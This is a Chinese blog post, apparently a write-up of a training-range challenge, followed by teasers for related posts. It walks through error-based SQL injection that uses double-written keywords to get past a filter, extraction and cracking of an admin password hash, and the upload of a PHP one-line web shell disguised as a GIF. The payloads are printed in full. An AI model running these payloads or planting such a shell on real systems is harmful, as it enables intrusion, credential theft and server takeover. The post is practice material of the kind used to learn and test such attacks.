封神台靶场学习-sql-注入绕过防护getshell

最新推荐文章于 2024-08-10 13:27:57 发布
最新推荐文章于 2024-08-10 13:27:57 发布
阅读量477 收藏 1
点赞数 5
文章标签: 学习 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/buggun6/article/details/134490015
版权

封神台靶场链接:封神台 - 掌控安全在线攻防演练靶场,一个专为网络安全从业人员设计的白帽黑客渗透测试演练平台。

关卡:

点击传送门跳转至关卡界面:

尝试在此页面sql注入后无果,于是使用御剑扫描目录试图找到登录界面,扫描结果:

尝试第一个admin路径后发现登录界面,url:http://pu2lh35s.ia.aqlab.cn/bees/admin/login.php

界面如下:

输入账户密码验证码后用burp抓包:

判断注入点:

报操作数据库失败,说明为注入点,使用order by看页数:

' order by 6#

order by 5显示正确

order by 6显示操作数据库错误:

由此可见页数为5

尝试联合注入看看结果:

' union select 1,2,3,4,5#

这里可以看到我们输进去的union和select被过滤了,于是构造字符拼接进行绕过:

' un union ion selselectect 1,2,3,4,5#

很明显没有返回我们想要的东西,联合注入这条路估计是行不通了 

注:这里我尝试过使用:

' ununionion selselectect 1,2,3,4,5#

结果报错:

我猜测他过滤的时候把空格也加上了

虽然联合注入行不通,但是我们可以尝试下其他注入方式,比如报错注入:

' a and nd extractvalue(1,concat(0x7e,(seselectlect database())))#

注:这里and的字符拼接也是我尝试过后发现他把and给我过滤了

nice,报错注入可以,我们发现数据库了

既然有了数据库名,我们就要进一步注入找账户名和密码了,幸运的是回显以及告诉我们账户表名和密码表名了:

 

于是我们直接构造报错注入语句查看用户名和密码:

先找用户名:

' a and nd extractvalue(1,concat(0x7e,(seselectlect admin_name fr from om bees_admin limit 0,1)))#

告诉我们说不止一行,叫我们用limit,好的,重新构造:

ok,成功找到用户名:admin

同样的道理构造注入语句查看密码:

' a and nd extractvalue(1,concat(0x7e,(seselectlect admin_password fr from om bees_admin limit 0,1)))#

 ok,检验告诉我们,这是一个md5加密,于是去cmd5:

Cmd5 - MD5 Online ,MD5 Decryption, MD5 Hash Decoder

解密发现密码也是admin,好家伙,弱口令是吧(

ok,既然拿到用户名和密码了,不直接登录还有其他选项吗

好的进入后台了,现在要找flag很明显就不得不找找文件上传点写码上传试试了

很好,没花啥功夫就找到了上传点,要求我们只允许上传的图片类型:gif|jpeg|png|jpg|bmp   

好的,上传文件后用burp抓包改类型:

我这里构造的一句话木马语句为:

GIF89a
<script language='php'>@eval($_POST[shell]);</script>

抓包后修改类型后放包: 

点击图片找到上传路径后蚁剑或者菜刀连接:

 我这里用的蚁剑:

根目录下找打flag:

总结:这次靶场个人感觉质量还是挺高的,和之前省赛的题有点像, 自己要坚持努力学习!

jjoshuaa
关注
神台靶场 | 布尔盲注 | Pass05-07
Fanny0602的博客
03-12 1604
神台靶场 | 布尔盲注 题目地址: 掌控安全学院SQL注入靶场 文章目录       Pass05          盲注          盲注查询步骤       Pass06       Pass07 任务 通过显错注入获得flag。 对该页面进行GET传参,传参名为id Pass05 数据库查询语句: select * from news where id=1 盲注: 1.查询到的数据只会显示有数据/没有结果 2.可以用ASCII进行猜测 盲注查询步骤: 1.数据库名字长度 2.数据库库名 3.
神台SQL注入-基础靶场1-布尔盲注
原味瓜子、的博客
10-09 1645
1
神台靶场-sql-注入绕过防护getshell
weixin_43446292的博客
03-10 5593
url为http://rhiq8003.ia.aqlab.cn/bees/,此页面尝试sql注入,不成功;在路径后面加admin可以跳转到管理员登录界面, http://rhiq8003.ia.aqlab.cn/bees/admin 在登录框测试sql注入,输入admin’/123456(直接使用admin/admin即可成功登录) 报错,存在字符型注入,使用报错注入进行测试,根据响应结果可知对and过滤,使用双写 admin’ an and d updatexml(1,concat(0x7e,(sel
渗透测试练习靶场汇总
最新发布
QXXXD的博客
08-10 745
掌控安全在线攻防演练靶场,一个专为网络安全从业人员设计的白帽黑客渗透测试演练平台。在线演示: http://vulfocus.fofa.so/当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料。
神台-尤里的复仇II 回归sql-注入绕过防护getshell
m0_72592923的博客
01-14 726
神台-尤里的复仇II 回归sql-注入绕过防护getshell
掌控者靶场sql-注入绕过防护getshell
xia_qin的博客
01-08 647
里面有一个flag,刚开始我还比较不相信,抱着试试的心态去给flag,没想到真是这个。这里靶场作者肯定不是这么想的,你们还可以试试照提示说的去做。先看提示,说让我们sql注入,然后获取getshell。我们先开始进行信息收集,这是第一步,也是最重要的一步。使用kali Linux的dirsearch扫描目录。结果找到了一个名叫flag.txt的文件。扫出了好多目录,其中还有后台登录目录。试试找找有没有出错的文件。
掌控靶场 尤里复仇回归sql-注入绕过防护getshell
sagat110的博客
12-27 585
央企扫地僧重拾渗透,在掌控学院的靶场练习闯关过程中,记录一些心得体会,信息收集、sql注入、弱口令、一句话木马等手段的综合利用,成功拿到flag
神台靶场
m0_71518346的博客
10-18 751
尝试,将测试语句放到cookie里面,再发送给服务器,因为网页防护一般只拦截Get、post传参。使用ModHeader插件,SQL语句的空格用加号代替。用from猜测有没有admin表 union select 1,2,3,4,5,6,7,8,9,10 from admin 被拦截。username和password字段的值:admin、b9a2a2b5dffb918c。直接尝试注入判断字段数order by 10。默认管理员后台是根目录的/admin/发现页面回显了2、3、7、8、9。
神台(尤里的复仇Ⅱ 回归)绕过防护getshell
Bu2n的博客
01-05 3554
解题思路 习惯在url后加admin,看是不是管理后台。 一看发现是,就不用目录扫描工具了 填入正确的验证码,抓包输入',查看有无报错 发现报错了,存在报错注入,看报错描述可以知道是字符型注入 查看当前数据库 payload ' or extractvalue(1,concat(0x7e,database()))%23 查看当前库的所有表 payload ' or extractvalue(1,concat(0x7e,(select group_concat(table_name)from info
神台SQL注入-基础靶场1-显错注入
原味瓜子、的博客
09-28 1429
一、显错注入 Pass-01 判断注入类型 id=1 //有回显 id=1' // No results found 判断为数字型注入 判断有几列 id=1 order by 3 //有回显 id=1 order by 4 // No results found 判断有三列 判断回显点 id=1 union select 1,2,3 ...
神台SQL注入-header注入
qq_40941912的博客
08-25 750
一、原理 数据路径出现符号是会爆错的 全局变量: $_REQUEST (获取GET/POST/COOKIE) COOKIE在新版本已经无法获取了 $_POST (获取POST传参) $_GET (获取GET的传参) $_COOKIE (获取COOKIE的值) $_SERVER (包含了诸如头信息(header)、路径(path)、以及脚本位置(script locations)等等信息的数组) **$_SERVER()**它包含着诸多的信息,有头信息(heander),路径(path),脚本位置
SQL注入-9种绕过Web应用程序防火墙的方式.rar
09-25
SQL注入-9种绕过web应用程序防火墙的方式,属于比较基础的,可以学习参考
神台SQL注入-基础靶场1-Head注入
原味瓜子、的博客
10-10 1158
1111
SQL注入安全狗直接getshell
qq_42042353的博客
09-26 452
实验环境 1、phpstudy搭建的SQLi-Labs(MySQL) 2、安全狗4.0 成功所需要的条件 1、准备一个可以过狗过杀软的一句话 2、网站目录的绝对路径 直接进入正题 普通的注入攻击直接被安全狗拦截 比方说我们获取到的网站绝对路径为“C:/phpStudy4IIS/WWW/” (这里获取网站绝对路径有很多方式,不一一说明) 这里用到的注入用的是MySQL的数据导入功能“LINES TERMINATED BY” 它的功能就是将我们构造好的字符串直接导入在具体的文件里。很多waf并没有对MySQL
神台靶场---尤里的复仇Ⅰ小芳!---第二章遇到阻难!绕过WAF过滤!
qq_44336568的博客
06-28 2656
神台----尤里的复仇I-第二章:遇到阻难!绕过WAF过滤!渗透学习靶场练习
神台靶场 第一章:为了女神小芳 (SQL注入
m0_65712192的博客
10-14 1888
神台靶场 第一章:为了女神小芳 (SQL注入
sql 整改措施 注入_浅谈SQL注入绕过
weixin_39826080的博客
12-30 174
前段时间一学弟一直叫我帮他弄防护过的网站,加上项目上总是跟开发“斗志斗勇”,漏洞改一次,我绕过一次,就这么循环反复。改完后说还存在这个漏洞,某开发的表情是这样的然后我默默的发了两张图给他觉得还是写一篇SQL注入绕过的文章吧,来安慰安慰我跟“这帮不好好改漏洞的开发”斗智斗勇、殚精竭虑的心!呸!说错了,想分享技术,然后换棒棒糖的心情!0X01 浅析绕过在我们遇到一些整改过的或者加了安全设备的网站时,总...
神台靶场练习
token_x的博客
08-05 397
神台靶场练习,未完待补充
神台DOM XSS靶场
qq_40941912的博客
10-05 1023
作业 DOM XSS靶场 (Rank: 10) 在页面上可填写的地方都输入 Native编码: \u003c\u0073\u0063\u0072\u0069\u0070\u0074\u003e\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0032\u0033\u0029\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e 插入到url中,发现弹窗了: 此处的payload被当作代码执行了 把xss平台
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值